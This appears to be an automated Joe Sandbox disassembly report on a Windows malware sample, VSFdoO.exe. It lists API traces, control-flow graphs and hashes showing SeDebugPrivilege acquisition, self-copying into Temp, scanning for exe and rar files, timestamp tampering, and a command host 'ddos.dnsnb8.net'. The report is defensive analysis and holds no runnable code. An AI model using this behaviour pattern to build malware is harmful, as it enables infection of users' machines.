                                                            control_flow_graph 117 b1973-b199a PathFileExistsA 118 b19a0-b19aa 117->118 119 b1ac7-b1acc 117->119 120 b19af-b19c2 CreateFileA 118->120 121 b1ace 119->121 122 b1ad0-b1ad5 119->122 123 b1a28-b1a36 GetFileSize 120->123 124 b19c4-b19d3 Sleep 120->124 121->122 125 b1af0-b1af6 122->125 126 b1ad7-b1ad9 122->126 128 b1a38-b1a3b 123->128 129 b1a87-b1a8b 123->129 124->120 127 b19d5-b1a0b call b185b wsprintfA CopyFileA 124->127 126->125 127->123 141 b1a0d-b1a26 CreateFileA 127->141 128->129 133 b1a3d-b1a51 VirtualAlloc 128->133 130 b1a8d-b1a90 FindCloseChangeNotification 129->130 131 b1a96-b1a9a 129->131 130->131 134 b1aad-b1ab1 131->134 135 b1a9c 131->135 133->129 137 b1a53-b1a57 133->137 139 b1adb-b1ae0 134->139 140 b1ab3-b1ab6 134->140 138 b1aa0-b1aa7 DeleteFileA 135->138 142 b1a59-b1a6d ReadFile 137->142 143 b1a80 137->143 138->134 146 b1ae2-b1ae5 139->146 147 b1ae7-b1aec 139->147 140->119 144 b1ab8-b1ac1 VirtualFree 140->144 141->123 145 b1a9e 141->145 142->129 148 b1a6f-b1a7e 142->148 143->129 144->119 145->138 146->147 147->125 149 b1aee 147->149 148->142 148->143 149->125
                                                            APIs
                                                            • PathFileExistsA.SHLWAPI(000B4E5C,00000000,C:\Users\user\AppData\Local\Temp\VSFdoO.exe), ref: 000B1992
                                                            • CreateFileA.KERNEL32(000B4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 000B19BA
                                                            • Sleep.KERNEL32(00000064), ref: 000B19C6
                                                            • wsprintfA.USER32 ref: 000B19EC
                                                            • CopyFileA.KERNEL32(000B4E5C,?,00000000), ref: 000B1A00
                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000B1A1E
                                                            • GetFileSize.KERNEL32(000B4E5C,00000000), ref: 000B1A2C
                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 000B1A46
                                                            • ReadFile.KERNEL32(000B4E5C,000B4E60,00000000,?,00000000), ref: 000B1A65
                                                            • FindCloseChangeNotification.KERNEL32(000000FF), ref: 000B1A90
                                                            • DeleteFileA.KERNEL32(?), ref: 000B1AA7
                                                            • VirtualFree.KERNEL32(000B4E60,00000000,00008000), ref: 000B1AC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                                            • String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\VSFdoO.exe
                                                            • API String ID: 2523042076-2538588460
                                                            • Opcode ID: 0bbcb5858df1271fef0d036c5dd04c46f71d5de466b7cf2284bdaf683e76e5d7
                                                            • Instruction ID: c6410d801945bca623ae877d691b79bca4d573511cac12b117943ffac5cd06d4
                                                            • Opcode Fuzzy Hash: 0bbcb5858df1271fef0d036c5dd04c46f71d5de466b7cf2284bdaf683e76e5d7
                                                            • Instruction Fuzzy Hash: 47514C71901219EFDF209FA8CCA4AEEBBB9FF04354F604669F515E6190D374AE40CBA1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 150 b28b8-b28ff memset wsprintfA 151 b29db-b29df 150->151 152 b2905-b290d 150->152 152->151 153 b2913-b2919 152->153 154 b291b-b294c memset wsprintfA call b29e2 153->154 155 b2956-b2965 strrchr 153->155 158 b2951 154->158 155->151 157 b2967-b2978 lstrcmpiA 155->157 159 b297a-b2981 call b1e6e 157->159 160 b2988-b2992 lstrcmpiA 157->160 158->151 163 b2986 159->163 160->151 162 b2994-b299b 160->162 164 b29ad-b29c9 strstr 162->164 165 b299d-b29a3 162->165 163->151 166 b29cb-b29d1 call b239d 164->166 167 b29d3-b29d6 call b2692 164->167 165->164 168 b29a5-b29a7 lstrcpy 165->168 166->151 167->151 168->164
                                                            APIs
                                                            • memset.MSVCRT ref: 000B28D3
                                                            • wsprintfA.USER32 ref: 000B28F7
                                                            • memset.MSVCRT ref: 000B2925
                                                            • wsprintfA.USER32 ref: 000B2940
                                                              • Part of subcall function 000B29E2: memset.MSVCRT ref: 000B2A02
                                                              • Part of subcall function 000B29E2: wsprintfA.USER32 ref: 000B2A1A
                                                              • Part of subcall function 000B29E2: memset.MSVCRT ref: 000B2A44
                                                              • Part of subcall function 000B29E2: lstrlen.KERNEL32(?), ref: 000B2A54
                                                              • Part of subcall function 000B29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 000B2A6C
                                                              • Part of subcall function 000B29E2: strrchr.MSVCRT ref: 000B2A7C
                                                              • Part of subcall function 000B29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 000B2A9F
                                                              • Part of subcall function 000B29E2: lstrlen.KERNEL32(Documents and Settings), ref: 000B2AAE
                                                              • Part of subcall function 000B29E2: memset.MSVCRT ref: 000B2AC6
                                                              • Part of subcall function 000B29E2: memset.MSVCRT ref: 000B2ADA
                                                              • Part of subcall function 000B29E2: FindFirstFileA.KERNEL32(?,?), ref: 000B2AEF
                                                              • Part of subcall function 000B29E2: memset.MSVCRT ref: 000B2B13
                                                            • strrchr.MSVCRT ref: 000B2959
                                                            • lstrcmpiA.KERNEL32(00000001,exe), ref: 000B2974
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                                            • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                                            • API String ID: 3004273771-3007274656
                                                            • Opcode ID: d2a31fb930a139240a58cdf579a19f05988180dd38f3bdb6e5d83f9d38be4d9e
                                                            • Instruction ID: a621390e111db4940c022d511ac08c03a09e91b1a0574dc0720a1de21a07dc3b
                                                            • Opcode Fuzzy Hash: d2a31fb930a139240a58cdf579a19f05988180dd38f3bdb6e5d83f9d38be4d9e
                                                            • Instruction Fuzzy Hash: 1B310B7294030CBBDB20A764DC85FDE37AC9F15750F140862F549E7181E6B4EAC48BA0

                                                            Control-flow Graph

                                                            APIs
                                                            • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 000B164F
                                                            • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 000B165B
                                                            • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\VSFdoO.exe,00000104), ref: 000B166E
                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 000B16AC
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 000B16BD
                                                              • Part of subcall function 000B139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\VSFdoO.exe), ref: 000B13BC
                                                              • Part of subcall function 000B139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 000B13DA
                                                              • Part of subcall function 000B139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 000B1448
                                                            • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\VSFdoO.exe), ref: 000B16E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\VSFdoO.exe$C:\Windows\system32$Documents and Settings
                                                            • API String ID: 123563730-3591484181
                                                            • Opcode ID: e8609b59f00b1db686eb14b519c7a43647a952c2139e0433c09210afdab47d6a
                                                            • Instruction ID: 918661c54ea18a90097b28aaf2e7ebd29eade1696eac7714db927116ccb7b7f9
                                                            • Opcode Fuzzy Hash: e8609b59f00b1db686eb14b519c7a43647a952c2139e0433c09210afdab47d6a
                                                            • Instruction Fuzzy Hash: C711E271594224BBEF207BA4ED6DEDB3F6DEF45361F600210F209910A2CA788A40CBA1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 205 b1000-b1023 CreateFileA 206 b1092-b1096 205->206 207 b1025-b1055 GetFileSize CreateFileMappingA MapViewOfFile 205->207 208 b107b-b1085 207->208 209 b1057-b105f 207->209 212 b108d-b1091 CloseHandle 208->212 213 b1087-b108b CloseHandle 208->213 210 b1061-b106e call b17d0 209->210 211 b1074-b1075 UnmapViewOfFile 209->211 210->211 211->208 212->206 213->212
                                                            APIs
                                                            • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,000B10E8,?), ref: 000B1018
                                                            • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75BF8400,?,http://%s:%d/%s/%s,000B10E8,?), ref: 000B1029
                                                            • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 000B1038
                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,000B10E8,?), ref: 000B104B
                                                            • UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,000B10E8,?), ref: 000B1075
                                                            • CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,000B10E8,?), ref: 000B108B
                                                            • CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,000B10E8,?), ref: 000B108E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                                            • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                            • API String ID: 1223616889-3273462101
                                                            • Opcode ID: 6196537c214ef2560d783b3863d99400b40b070ca25e46c9529a73fbc4da0cf5
                                                            • Instruction ID: 05817b92eb7a8fe7216b93d61791311f7ae9dfbc54c39cd5d08e40c8091a3edb
                                                            • Opcode Fuzzy Hash: 6196537c214ef2560d783b3863d99400b40b070ca25e46c9529a73fbc4da0cf5
                                                            • Instruction Fuzzy Hash: DE0184B111425CBFE7307F609C98EABBBECDF44799F114629F245A2190D6746E448B70

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 371 b2c48-b2c75 memset call b1973 374 b2cb2-b2cb9 371->374 375 b2c77-b2c7f 371->375 378 b2cbb-b2cc2 VirtualFree 374->378 379 b2cc8-b2ccc 374->379 376 b2c8f-b2cac CreateThread WaitForMultipleObjects 375->376 377 b2c81-b2c8b 375->377 376->374 377->376 378->379
                                                            APIs
                                                            • memset.MSVCRT ref: 000B2C57
                                                              • Part of subcall function 000B1973: PathFileExistsA.SHLWAPI(000B4E5C,00000000,C:\Users\user\AppData\Local\Temp\VSFdoO.exe), ref: 000B1992
                                                              • Part of subcall function 000B1973: CreateFileA.KERNEL32(000B4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 000B19BA
                                                              • Part of subcall function 000B1973: Sleep.KERNEL32(00000064), ref: 000B19C6
                                                              • Part of subcall function 000B1973: wsprintfA.USER32 ref: 000B19EC
                                                              • Part of subcall function 000B1973: CopyFileA.KERNEL32(000B4E5C,?,00000000), ref: 000B1A00
                                                              • Part of subcall function 000B1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000B1A1E
                                                              • Part of subcall function 000B1973: GetFileSize.KERNEL32(000B4E5C,00000000), ref: 000B1A2C
                                                              • Part of subcall function 000B1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 000B1A46
                                                              • Part of subcall function 000B1973: ReadFile.KERNEL32(000B4E5C,000B4E60,00000000,?,00000000), ref: 000B1A65
                                                            • CreateThread.KERNEL32(00000000,00000000,000B2B8C,00000000,00000000,00000000), ref: 000B2C99
                                                            • WaitForMultipleObjects.KERNEL32(00000001,000B16BA,00000001,000000FF,?,000B16BA,00000000), ref: 000B2CAC
                                                            • VirtualFree.KERNEL32(00DB0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\VSFdoO.exe,000B4E5C,000B4E60,?,000B16BA,00000000), ref: 000B2CC2
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\VSFdoO.exe, xrefs: 000B2C69
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                                            • String ID: C:\Users\user\AppData\Local\Temp\VSFdoO.exe
                                                            • API String ID: 2042498389-3842143133
                                                            • Opcode ID: c2e16151e05b415e8476228b50785f129391df00ae0e3266f4a09e609bfd7947
                                                            • Instruction ID: d6bdc167c6e1892301995d2692a25611ba2aecf705950e01e0304e0e5a9c9c52
                                                            • Opcode Fuzzy Hash: c2e16151e05b415e8476228b50785f129391df00ae0e3266f4a09e609bfd7947
                                                            • Instruction Fuzzy Hash: 85018F716412247AE710ABA59C1AEEF7FACEF11B60F104220BA15DA1C2D6A4DA00C7E0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 380 b14e1-b14fb 381 b14fd-b1510 GetModuleHandleA 380->381 382 b1541-b1547 380->382 383 b151a-b1535 VirtualQuery 381->383 384 b1512-b1518 381->384 385 b1549-b154c 382->385 386 b1573-b1574 call b1638 382->386 387 b153b 383->387 388 b1537-b1539 383->388 384->382 389 b1569-b1570 385->389 390 b154e-b1555 385->390 393 b1579-b157a ExitProcess 386->393 387->382 388->382 388->387 390->389 392 b1557-b1566 call b1af9 390->392 392->389
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 000B1504
                                                            • VirtualQuery.KERNEL32(000B14E1,?,0000001C), ref: 000B1525
                                                            • ExitProcess.KERNEL32 ref: 000B157A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: ExitHandleModuleProcessQueryVirtual
                                                            • String ID:
                                                            • API String ID: 3946701194-0
                                                            • Opcode ID: 26e43c2b5b2f6e1daa3d921cb856ab7c8400d7e536bd5248292eee41476eea5c
                                                            • Instruction ID: a0ad7bf031dbc4daefca639c69be69e91bfddbc31272faa7ffc5d2c2e624ce83
                                                            • Opcode Fuzzy Hash: 26e43c2b5b2f6e1daa3d921cb856ab7c8400d7e536bd5248292eee41476eea5c
                                                            • Instruction Fuzzy Hash: F711A171A00214EFEB30EFA5A8A5AFD77FCEB84710B90422BF402D2252D3389E41DB50

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 396 b1915-b1922 397 b1928-b192c 396->397 398 b1924-b1926 396->398 400 b194f-b1952 397->400 401 b192e-b194d memset GetFileTime 397->401 399 b196e-b1970 398->399 400->399 403 b1954-b1960 SetFileTime 400->403 402 b1966-b1968 401->402 404 b196a 402->404 405 b196c 402->405 403->402 404->405 405->399
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: FileTimememset
                                                            • String ID:
                                                            • API String ID: 176422537-0
                                                            • Opcode ID: d3eb56615076a72fad36380c5ffd35736b476811a0a1f42bfec4f45431b196af
                                                            • Instruction ID: 854244eb7704a942d7f5c3635670ad21013a508abdc3ebb2dfb353f580fc09f8
                                                            • Opcode Fuzzy Hash: d3eb56615076a72fad36380c5ffd35736b476811a0a1f42bfec4f45431b196af
                                                            • Instruction Fuzzy Hash: 7EF04432200249ABD7709E26DC24BEB77ECAF50361F508536F516D1050E730D6458BA0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 406 b6158-b6189 VirtualFree 407 b618c-b6192 406->407 408 b6198-b61b0 VirtualFree 407->408 409 b60c7-b60cf 407->409 411 b61ba-b61c8 408->411 412 b61b2-b61b4 408->412 409->407 410 b60d5-b60f8 VirtualAlloc 409->410 432 b60fa-b60fc call b66c8 410->432 433 b60fe-b6106 410->433 414 b61ca-b61d7 411->414 415 b6243-b6251 411->415 412->411 416 b61dd-b61e0 414->416 418 b6253 415->418 419 b6264-b626f 415->419 416->415 421 b61e2-b61f2 416->421 423 b6255-b6258 418->423 420 b6271-b6276 419->420 424 b6389-b63b1 VirtualProtect 420->424 425 b627c-b6289 420->425 426 b61f5-b61fe 421->426 423->419 428 b625a-b6262 423->428 431 b63b7-b63ba 424->431 445 b628b 425->445 446 b6292-b6298 425->446 429 b620c-b6219 426->429 430 b6200-b6203 426->430 428->423 439 b6238-b623f 429->439 437 b621b-b6228 430->437 438 b6205-b6208 430->438 440 b63fc-b63ff VirtualProtect 431->440 441 b63bc-b63c2 431->441 432->433 434 b6108-b611d 433->434 435 b6155-b6189 VirtualFree 433->435 443 b611f-b6121 434->443 435->407 437->439 447 b622a-b6236 438->447 448 b620a 438->448 439->426 449 b6241 439->449 444 b6400-b6416 440->444 441->441 450 b63c4 441->450 452 b6123 443->452 453 b6151-b6154 443->453 454 b6418-b641d 444->454 455 b6420-b6425 444->455 445->446 456 b62a2-b62ac 446->456 447->439 448->439 449->416 450->440 457 b63c6-b63cf 450->457 452->453 458 b6125-b6128 452->458 453->435 459 b62ae 456->459 460 b62b1-b62c8 456->460 461 b63d1 457->461 462 b63d4-b63d8 457->462 463 b612a-b612e 458->463 464 b6134-b613b 458->464 459->460 465 b62ce-b62d4 460->465 466 b6373-b6384 460->466 461->462 467 b63da 462->467 468 b63dd-b63e1 462->468 463->464 475 b6130-b6132 463->475 464->475 476 b613d-b614f 464->476 471 b62da-b62f1 465->471 472 b62d6-b62d9 465->472 466->420 467->468 473 b63e3 468->473 474 b63e7-b63fa VirtualProtect 468->474 478 b62f3-b62f9 471->478 479 b6365-b636e 471->479 472->471 473->474 474->431 474->440 475->443 476->443 480 b62fb-b630f 478->480 481 b6314-b6326 478->481 479->456 482 b6426-b64c0 480->482 483 b6328-b634a 481->483 484 b634c-b6360 481->484 493 b64c2 482->493 494 b6535-b6537 482->494 483->479 484->482 497 b64f8 493->497 498 b64c5-b64cd 493->498 495 b659a 494->495 496 b6539 494->496 501 b659b-b659d 495->501 499 b653b-b6541 496->499 500 b65b4 496->500 504 b64fa-b64fe 497->504 505 b656c-b656f 497->505 502 b64cf-b64d4 498->502 503 b6542-b6545 498->503 499->503 511 b65be-b6608 500->511 506 b659f 501->506 507 b6591-b6593 501->507 509 b6517-b651c 502->509 510 b64d6-b64d9 502->510 508 b654d-b6550 503->508 512 b6572 504->512 513 b6500 504->513 505->512 517 b6588-b658b 506->517 507->501 516 b6595 507->516 508->511 518 b6552-b6556 508->518 514 b651d-b651e 509->514 515 b6583-b6587 509->515 510->508 519 b64db-b64f5 510->519 520 b6573-b6576 512->520 521 b6522-b6533 513->521 522 b6502 513->522 514->521 515->517 516->495 523 b658d-b658f 517->523 524 b65a1-b65a3 517->524 525 b6578-b657f 518->525 526 b6558-b6569 518->526 519->497 520->525 521->494 522->520 527 b6504-b6513 522->527 523->507 525->515 526->505 527->494 529 b6515 527->529 529->509
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 000B60DF
                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 000B6189
                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 000B61A5
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 1852963964-0
                                                            • Opcode ID: 110a63128ad7c0c470988bb7f957b2e7d11d9a54f55f69f0743d88151540587d
                                                            • Instruction ID: a397d976d8ff86b6113f7bf4774e81c6b582c247a8fb37d60e7ad849e5b7c555
                                                            • Opcode Fuzzy Hash: 110a63128ad7c0c470988bb7f957b2e7d11d9a54f55f69f0743d88151540587d
                                                            • Instruction Fuzzy Hash: 34116D31A00A498FDF718F58CC917DD37A1EF01301F690529DE896B291DA7A2944CB94
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\VSFdoO.exe,?,?,?,?,?,?,000B13EF), ref: 000B11AB
                                                            • OpenProcessToken.ADVAPI32(00000000,00000028,000B13EF,?,?,?,?,?,?,000B13EF), ref: 000B11BB
                                                            • AdjustTokenPrivileges.ADVAPI32(000B13EF,00000000,?,00000010,00000000,00000000), ref: 000B11EB
                                                            • CloseHandle.KERNEL32(000B13EF), ref: 000B11FA
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,000B13EF), ref: 000B1203
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\VSFdoO.exe, xrefs: 000B11A5
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                                            • String ID: C:\Users\user\AppData\Local\Temp\VSFdoO.exe
                                                            • API String ID: 75692138-3842143133
                                                            • Opcode ID: 4e91fdc44ec7b5c809a67abd2cc65f4e45456ac87ec062799c7151e360732654
                                                            • Instruction ID: 1506912ee3d3245cad5c4b99faeb0d541aaa32bbd261c71b63f82bd68919e8a3
                                                            • Opcode Fuzzy Hash: 4e91fdc44ec7b5c809a67abd2cc65f4e45456ac87ec062799c7151e360732654
                                                            • Instruction Fuzzy Hash: E401E875900209EFEB00EFD4CD99AEEBBB8FF04305F604569E605A2150D7755F449F50
                                                            APIs
                                                            • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\VSFdoO.exe), ref: 000B13BC
                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 000B13DA
                                                            • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 000B1448
                                                              • Part of subcall function 000B119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\VSFdoO.exe,?,?,?,?,?,?,000B13EF), ref: 000B11AB
                                                              • Part of subcall function 000B119F: OpenProcessToken.ADVAPI32(00000000,00000028,000B13EF,?,?,?,?,?,?,000B13EF), ref: 000B11BB
                                                              • Part of subcall function 000B119F: AdjustTokenPrivileges.ADVAPI32(000B13EF,00000000,?,00000010,00000000,00000000), ref: 000B11EB
                                                              • Part of subcall function 000B119F: CloseHandle.KERNEL32(000B13EF), ref: 000B11FA
                                                              • Part of subcall function 000B119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,000B13EF), ref: 000B1203
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\VSFdoO.exe, xrefs: 000B13A8
                                                            • SeDebugPrivilege, xrefs: 000B13D3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                                            • String ID: C:\Users\user\AppData\Local\Temp\VSFdoO.exe$SeDebugPrivilege
